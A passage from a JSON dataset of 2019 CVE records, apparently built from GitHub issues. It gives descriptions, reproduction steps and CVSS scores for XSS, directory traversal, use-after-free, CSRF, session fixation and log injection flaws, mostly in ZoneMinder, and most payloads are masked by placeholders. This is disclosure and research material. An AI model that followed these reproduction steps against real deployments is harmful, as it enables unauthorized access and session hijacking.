        "CVE_ID": "CVE-2019-7236",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/53",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/53",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2019-01-30T07:16:00Z",
        "description": "iCMS NUMBERTAG Directory Traversal. in PATHTAG ERRORTAG in PATHTAG ERRORTAG FILETAG chang dir to ../ FILETAG we can traver any floder in the server FILETAG author by ji. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-7250",
        "Issue_Url_old": "https://github.com/davidrthorn/cross_reference/issues/32",
        "Issue_Url_new": "https://github.com/davidrthorn/cross_reference/issues/32",
        "Repo_new": "davidrthorn/cross_reference",
        "Issue_Created_At": "2019-01-30T16:04:38Z",
        "description": "Stored XSS vulnerability in preview boxes via label and references text. Overall description A stored XSS vulnerability in the preview boxes in the configuration panel may allow a malicious user to use both label text and references text to inject arbitrary javascript code (via script tags, event handlers, etc.). Since the code is stored by the plugin, the attacker may be able to target anyone that open the configuration panel of the plugin. Steps to reproduce NUMBERTAG Create a new document with the plugin enabled NUMBERTAG Either leave selected the current category, or create a new one NUMBERTAG In either the label text box or the references text box (or both if you prefer) insert one of the following codes: APITAG ERRORTAG NUMBERTAG Press APITAG and apply NUMBERTAG Now, when the victim open the configuration panel and select the category of the step NUMBERTAG a popup will appear. Categories are shown in alphabetical order, so if the chosen one in step NUMBERTAG is the first to be shown, the victim does not even need to select it to be affected. Please note that examples proposed are only for demonstration. An attacker may inject arbitrary harmful javascript code. Resolution You need to escape any html tag from within the preview box in the configuration panel. Additional information A CVE ID request have been submitted. The issue will be updated with the actual number asap.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7295",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2129",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2129",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-01-25T16:06:05Z",
        "description": "A XSS with resultant remote command execution when Typora rendering Mathematical formula. When open the document with the following content,it will execute commands. version NUMBERTAG APITAG ERRORTAG version NUMBERTAG ERRORTAG The Linux and Mac version are also affected.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7296",
        "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2131",
        "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2131",
        "Repo_new": "typora/typora-issues",
        "Issue_Created_At": "2019-01-26T09:10:47Z",
        "description": "The XSS vulnerability when rendering Mathematical formula inline.. The new version APITAG only fixed the vulnerability when rendering mathematical formula in block. However the when rendering inline also has this problem,so the new poc: $ APITAG APITAG APITAG $",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7317",
        "Issue_Url_old": "https://github.com/glennrp/libpng/issues/275",
        "Issue_Url_new": "https://github.com/glennrp/libpng/issues/275",
        "Repo_new": "glennrp/libpng",
        "Issue_Created_At": "2019-01-26T00:53:09Z",
        "description": "Use after free . We ran some tests on an older version of libpng and found a use after free bug while running one the test cases. It looks like the bug is still there in the latest code. Here's the output from our tool DTS_MSG: Stensal DTS detected a fatal program error! DTS_MSG: Continuing the execution will cause unexpected behaviors, abort! DTS_MSG: Access the memory block that is freed. DTS_MSG: Diagnostic information: APITAG Caution: the allocation info is correct only if the freed memory is not reused. the memory block (start NUMBERTAG ffb NUMBERTAG c, size NUMBERTAG bytes) was allocated at PATHTAG NUMBERTAG Stack trace (most recent call first NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG DTS_MSG: [PRO] This detection can be configured with APITAG DTS_MSG: [PRO] but it's not recommanded to change to warning or disabled. Basically, APITAG calls png_safe_execute(image, png_image_free_function, image). In png_safe_execute you have the following code: ERRORTAG When result is NUMBERTAG image is freed, but then image >opaque >error_buf is assigned directly after.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 3.6,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2019-7325",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2450",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2450",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:31:01Z",
        "description": "Reflected Site Scripting(XSS) Multiple ($_SERVER['PHP_SELF NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug There exists XSS in multiple views as it insecurely utilizes APITAG , that is without applying any proper filtration All the view files available under PATHTAG are vulnerable, expect few listed below. PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG To Reproduce Affected URL : URLTAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7326",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2452",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2452",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:44:53Z",
        "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view console , insecurely prints the Host value on the webpage, without applying any proper filtration, leading to Self stored XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the URLTAG Inject the XSS payload into the Host Name field. Navigate to the affected URL, payload will be triggered APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7327",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2447",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2447",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:18:03Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the scale parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7329",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2446",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2446",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:14:11Z",
        "description": "Reflected Cross Site Scripting (XSS) Multiple ($_SERVER['PHP_SELF']). Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The form action on the multiple views utilizes APITAG insecurely. Any arbitrary input appended to the webroot URL, without any proper filtration would lead to an reflected XSS. To Reproduce Affected URL : FILETAG \"> APITAG ?view=monitor Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7330",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2448",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2448",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:22:37Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the show parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG APITAG Payload used ERRORTAG Navigate to the Affected URL(with valid fid,eid), Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7332",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2442",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2442",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T17:17:24Z",
        "description": "Reflected Cross Site Scripting (XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view download , while exporting an event file, prints the eid APITAG ID) on the webpage without applying any proper filtration, leading to an XSS issue. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7333",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2441",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2441",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T17:06:53Z",
        "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view download , while exporting an event file, prints the Exportfile parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG {injectionpoint}$&generated NUMBERTAG Payload used APITAG Navigate to the Affected URL Click on Download, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7334",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2443",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2443",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T18:42:31Z",
        "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view export , while exporting an event file, prints the Exportfile name of the webpage without applying any proper filtration, leading to an XSS issue To Reproduce Affected URL : URLTAG {injectionpoint}$&generated NUMBERTAG Payload used APITAG Navigate to the Affected URL Click on Download, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7335",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2453",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2453",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:52:38Z",
        "description": "Self Stored Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view log , insecurely prints the Log Message value on the webpage without applying any proper filtration, leading to XSS. Example Attacker can entice the victim visit an non existing view (using XSS payload instead of a valid view), the non existing view will be reflected back in the logs, thereby triggering the XSS payload. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to any URL, which reflects back the user supplied input into the logs view ( URLTAG Navigate to the affected link, payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7336",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2457",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2457",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:09:34Z",
        "description": "Self Stored Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Multiple views include the view APITAG , being the file where the vulnerable code exists. The view APITAG contains a filter form, where it takes in input from the user & saves it into the session, in order to preserve & retrieve it later (insecurely). The value of APITAG & Source parameter are being displayed without any output filtration being applied. To Reproduce Multiple Views FILETAG example ) Affected URL : URLTAG \"> APITAG APITAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7337",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2456",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2456",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:03:05Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view events , insecurely displays the limit parameter value, without applying any proper output filtration leading to XSS. This issue exists because of function APITAG in ERRORTAG which insecurely returns the value of limit query string parameter without applying any filtration. To Reproduce Affected URL : URLTAG \"> APITAG &page NUMBERTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-7338",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2454",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2454",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:56:02Z",
        "description": "Self Stored Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view group , insecurely displays the Group name , that is without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL, Inject the XSS payload into the Name field (window will be closed). Now on the current window, click on the group name, popup will be opened & XSS payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7340",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2462",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2462",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:39:09Z",
        "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the APITAG parameter value, without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7341",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2463",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2463",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:50:25Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7342",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2461",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2461",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:33:09Z",
        "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the APITAG parameter value, without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG POST Data CODETAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7343",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2464",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2464",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:55:16Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7344",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2455",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2455",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T19:59:50Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the Filter name , without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG \"> APITAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7345",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2468",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2468",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T21:25:49Z",
        "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view options , does no input validation to the value supplied to APITAG , APITAG , APITAG , APITAG field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, APITAG , APITAG , APITAG , APITAG will beset with the Payload & get triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2019-7346",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2469",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2469",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T21:36:28Z",
        "description": "Weak Cross site Resource Forgery(CSRF) Protection . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Try again button in callback function Whenever a CSRF check fails,a callback function is called displaying a fail message. Unfortunately there also exists an APITAG again\" button on the page, which allows to resend the failed request, making the attack successful. To Reproduce APITAG Expected behavior This allows an attacker to easily carry out the CSRF attack. Normally users are not too technical to understand what CSRF failure message is & would generally click on APITAG Again\", themselves making the attack successful. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7347",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2476",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2476",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-25T03:01:24Z",
        "description": "Time of check Time of use (TOCTOU) Race Condition . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Time of check, time of use race conditions occur when a resource is checked for a particular value, that value is changed, then the resource is used, based on the assumption that the value is still the same as it was at check time. To Reproduce The session is active for authenticated user, even after deleted from users table, leading to Time of check Time of use (TOCTOU) Race Condition. This can allow an non existing user to access & modify accessible records APITAG APITAG etc). Affected URL : FILETAG APITAG access) Navigate to users page and APITAG New User\" from users tab and assign any privileges. Delete the newly added user. Deleted user can still access the interface & make modifications to the allowed operations. An attacker can gain access to otherwise unauthorized resources and modify, delted or update application data. APITAG APITAG APITAG Expected behavior Destroy the user's session, once the users record is deleted from the database. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2019-7348",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2467",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2467",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T21:19:53Z",
        "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view user , does no input validation to the value supplied to username field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, APITAG , APITAG , APITAG , APITAG will be set with the Payload & get triggered APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7349",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2465",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2465",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T20:59:00Z",
        "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2019-7350",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2471",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2471",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T21:49:38Z",
        "description": "Improper Session Management Session Fixation. Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Before any response being rendered on the web page, a cookie is being set as part of response via Set Cookie APITAG due to improper implementation, multiple cookies NUMBERTAG are being set when a user successfully logs in, which isn't an expected APITAG when the next user logs into the application using the same browser, the last user's last cookie is being set as the present user's first cookie. To Reproduce Login into the application, capture the response APITAG HTTP header addon for firefox) Multiple Set Cookie headers will be present in the response Exploitation Actors User A APITAG User B APITAG NUMBERTAG User B logs into the application, captures his own Cookies & logs out. User B's cookie : Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG APITAG NUMBERTAG User A Uses the same browser & log into the application. User A's cookie Set Cookie: APITAG path=/; APITAG APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG NUMBERTAG User B uses User A's Last cookie to hijack the User B's session (locally/remotely) Expected behavior Only set single cookie the user & invalidate the same once user logs out of the application. Debug Logs None",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 5.2,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2019-7351",
        "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2466",
        "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2466",
        "Repo_new": "zoneminder/zoneminder",
        "Issue_Created_At": "2019-01-24T21:05:23Z",
        "description": "Log Injection. Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non repudiation and incident forensics capability Most components of APITAG can emit informational, warning, error and debug messages in a standard format. These messages can be logged in.. Example of these messages is: APITAG The first part refers to the date and time of the entry, the next section is the name (or an abbreviated version) of the script, followed by the process id in square brackets, a severity code (INF, WAR, ERR or DBG) and the debug text. All the mentioned information can be manipulated & inject by an attacker by enticing the victim to visit a specially crafted link, which in turn will inject a custom Log message provided by the attacker. The same will be reflected in the Log view page To Reproduce Affected URL : FILETAG POST Data CODETAG Navigate to the Affected URL, Custom Log will be injected. Navigate to the URLTAG Log will be visible. APITAG Expected behavior Do not allow 